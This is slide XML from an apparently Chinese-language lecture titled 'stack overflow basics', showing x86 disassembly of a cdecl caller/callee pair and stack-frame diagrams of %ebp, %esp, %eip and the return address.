            <a:off x="7946400" y="2799333"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="666666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14" name="Shape 514"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="3208933"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="666666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15" name="Shape 515"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="3618533"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="666666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16" name="Shape 516"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8655400" y="1485751"/>
            <a:ext cx="1286800" cy="3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Stack</a:t>
            </a:r>
            <a:endParaRPr sz="1867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17" name="Shape 517"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4028133"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword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18" name="Shape 518"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4437733"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword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19" name="Shape 519"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4847333"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword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20" name="Shape 520"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="5256933"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword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21" name="Shape 521"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="5666533"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="522" name="Shape 522"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6013200" y="2208367"/>
            <a:ext cx="1933200" cy="365600"/>
            <a:chOff x="3447575" y="1633500"/>
            <a:chExt cx="1449900" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="523" name="Shape 523"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3447575" y="1633500"/>
              <a:ext cx="965100" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1333" b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:highlight>
                    <a:srgbClr val="666666"/>
                  </a:highlight>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%esp</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en" sz="1333" kern="0"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rPr>
                <a:t>, %ebp</a:t>
              </a:r>
              <a:endParaRPr sz="1333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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="524" name="Shape 524"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1763700"/>
              <a:ext cx="484800" cy="6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525" name="Shape 525"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-162933" y="4134381"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="526" name="Shape 526"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3510225" y="1324000"/>
              <a:ext cx="641400" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1333" kern="0"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rPr>
                <a:t>%eip</a:t>
              </a:r>
              <a:endParaRPr sz="1333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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="527" name="Shape 527"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4151625" y="1454200"/>
              <a:ext cx="484800" cy="6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sp>
        <p:nvSpPr>
          <p:cNvPr id="528" name="Shape 528"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4734467" y="4028133"/>
            <a:ext cx="1785600" cy="4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" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov   %ebp, $esp</a:t>
            </a:r>
            <a:endParaRPr sz="1333" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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pop   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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529" name="Shape 529"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="528" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3988867" y="4129733"/>
            <a:ext cx="745600" cy="103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30" name="Shape 530"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4734467" y="4134367"/>
            <a:ext cx="100800" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2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F14B5702-AF5F-44CB-BDA6-9C3575090808}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="823118"/>
            <a:ext cx="46394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函数调用栈的工作方式（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cdecl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704D6CB6-A7B8-49E9-82D8-1010D40931C5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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栈溢出基础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| C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语言函数调用栈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Shape 536"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="4437733"/>
            <a:ext cx="4712800" cy="225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" sz="1333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00000000 &lt;callee&gt;:</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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0:   55          push   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1:   89 e5       mov    %esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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3:   8b 55 08    mov    0x8(%ebp),%edx</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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6:   8b 45 0c    mov    0xc(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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9:   01 c2       add    %eax,%edx</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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b:   8b 45 10    mov    0x10(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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e:   01 d0       add    %edx,%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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10:   5d          pop    %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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11:   c3          ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333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37" name="Shape 537"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="1443533"/>
            <a:ext cx="4712800" cy="31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" sz="1333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00000012 &lt;caller&gt;:</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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12:   55              push   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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13:   89 e5           mov    %esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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15:   83 ec 10        sub    $0x10,%esp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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18:   6a 03           push   $0x3</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1a:   6a 02           push   $0x2</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1c:   6a 01           push   $0x1</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1e:   e8 fc ff ff ff  call   1f &lt;callee&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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23:   83 c4 0c        add    $0xc,%esp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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26:   89 45 fc        mov    %eax,-0x4(%ebp)</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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29:   83 45 fc 04     addl   $0x4,-0x4(%ebp)</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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2d:   8b 45 fc        mov    -0x4(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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30:   c9              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>leave</a:t>
            </a:r>
            <a:endParaRPr sz="1333" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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31:   c3              ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333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38" name="Shape 538"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="1980133"/>
            <a:ext cx="2704800" cy="4096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%ebp in caller's caller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39" name="Shape 539"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2389733"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="540" name="Shape 540"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2799333"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="666666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41" name="Shape 541"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="3208933"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="666666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42" name="Shape 542"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="3618533"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="666666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43" name="Shape 543"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4028133"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword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44" name="Shape 544"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4437733"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword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45" name="Shape 545"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4847333"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword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46" name="Shape 546"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="5256933"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword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47" name="Shape 547"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="5666533"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="548" name="Shape 548"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-162933" y="4134381"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="549" name="Shape 549"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3510225" y="1324000"/>
              <a:ext cx="641400" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1333" kern="0"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rPr>
                <a:t>%eip</a:t>
              </a:r>
              <a:endParaRPr sz="1333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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="550" name="Shape 550"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4151625" y="1454200"/>
              <a:ext cx="484800" cy="6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sp>
        <p:nvSpPr>
          <p:cNvPr id="551" name="Shape 551"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4734467" y="4028133"/>
            <a:ext cx="1785600" cy="4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" sz="1333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mov   %ebp, $esp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>pop   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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552" name="Shape 552"/>
          <p:cNvCxnSpPr>
            <a:endCxn id="551" idx="1"/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3988867" y="4129733"/>
            <a:ext cx="745600" cy="103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53" name="Shape 553"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4734467" y="4134367"/>
            <a:ext cx="100800" cy="254000"/>
          </a:xfrm>
          <a:prstGeom prst="leftBrace">
            <a:avLst>
              <a:gd name="adj1" fmla="val 8333"/>
              <a:gd name="adj2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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="554" name="Shape 554"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5798417" y="1822941"/>
            <a:ext cx="2147980" cy="365600"/>
            <a:chOff x="3286490" y="1640558"/>
            <a:chExt cx="1610985" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="555" name="Shape 555"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3286490" y="1640558"/>
              <a:ext cx="1126200" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1333" b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:highlight>
                    <a:srgbClr val="666666"/>
                  </a:highlight>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%esp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="556" name="Shape 556"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1770756"/>
              <a:ext cx="484800" cy="6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sp>
        <p:nvSpPr>
          <p:cNvPr id="557" name="Shape 557"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="1570533"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ret addr (caller's caller)</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial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93F49922-A61B-4DC7-9E28-4A190D888FD1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="823118"/>
            <a:ext cx="46394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函数调用栈的工作方式（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cdecl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95C54D8C-C55A-4C11-B98A-C553977D567D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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栈溢出基础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| C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语言函数调用栈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Shape 563"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="4437733"/>
            <a:ext cx="4712800" cy="225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" sz="1333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00000000 &lt;callee&gt;:</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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0:   55          push   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1:   89 e5       mov    %esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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3:   8b 55 08    mov    0x8(%ebp),%edx</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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6:   8b 45 0c    mov    0xc(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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9:   01 c2       add    %eax,%edx</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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b:   8b 45 10    mov    0x10(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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e:   01 d0       add    %edx,%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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10:   5d          pop    %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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11:   c3          ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333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64" name="Shape 564"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="1443533"/>
            <a:ext cx="4712800" cy="31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" sz="1333" kern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00000012 &lt;caller&gt;:</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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12:   55              push   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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13:   89 e5           mov    %esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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15:   83 ec 10        sub    $0x10,%esp</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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18:   6a 03           push   $0x3</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333" kern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1a:   6a 02           push   $0x2</a:t>
            </a:r>
            <a:endParaRPr sz="1333" kern="0"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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
